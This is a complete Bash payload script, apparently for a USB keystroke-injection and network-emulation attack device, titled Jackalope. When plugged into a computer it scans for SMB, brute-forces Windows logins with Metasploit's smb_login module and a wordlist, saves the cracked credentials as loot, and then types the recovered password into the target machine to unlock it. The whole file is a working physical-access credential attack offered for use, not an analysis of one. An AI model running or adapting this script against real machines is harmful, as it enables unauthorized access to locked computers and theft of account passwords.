#!/bin/bash
#
# Title: Jackalope
# Author: catatonic
# Version: 1.1.0

# Check readiness & prepare environment
LED SETUP

REQUIRETOOL metasploit-framework
ATTACKMODE HID RNDIS_ETHERNET

# Ensure loot is available for recording results.
mount /dev/nandf /root/udisk/

ORIGINAL_SWITCH=$SWITCH_POSITION
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTBASE=/root/udisk/loot/Jackalope/

# SETUP
GET TARGET_IP
GET TARGET_HOSTNAME

COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
COUNT=$((COUNT+1))
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
mkdir -p $LOOTDIR

MSF_DIR=/tools/metasploit-framework

# Save environment information:
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt

SYNC ()
{
	sync; sleep 1; sync
}
CLEAR_PW()
{
	LED SPECIAL
	rm $PAYLOAD_DIR/quack_pass.txt
	SYNC
	WAIT
}
ENTER_PW()
{
	sleep 1
	QUACK $ORIGINAL_SWITCH/quack_pass.txt
	QUACK ENTER
}
RECON()
{
	ATTACKMODE RNDIS_ETHERNET
	# Stage 1: Recon
	LED STAGE1
	echo "Executing nmap..." >> $LOOTDIR/log.txt
	nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
	if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
	then
		LED FAIL2
		SYNC
		exit
	fi
}
EXPLOIT()
{
	# Stage 2: Exploit
	LED STAGE2
	export HOME=/root
	cd $MSF_DIR
	./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt

	if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
	then
		LED FAIL
		echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt
		SYNC
		exit
	fi

	grep "^\[+\]" $LOOTDIR/msfconsole.txt  | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
	grep "^\[+\]" $LOOTDIR/msfconsole.txt  | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt

	# Focus needs to be set on the password field manually.
	echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
	cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt

	SYNC
}

# High level view.
while true
do
	if [ -f $PAYLOAD_DIR/quack_pass.txt ];
	then
		LED FINISH
	else
		RECON
		EXPLOIT
		continue
	fi

	WAIT

	# User's choice, clear old password or enter password.
	if [ "$SWITCH_POSITION" == "switch3" ];
	then
		CLEAR_PW
	else
		ENTER_PW
	fi
done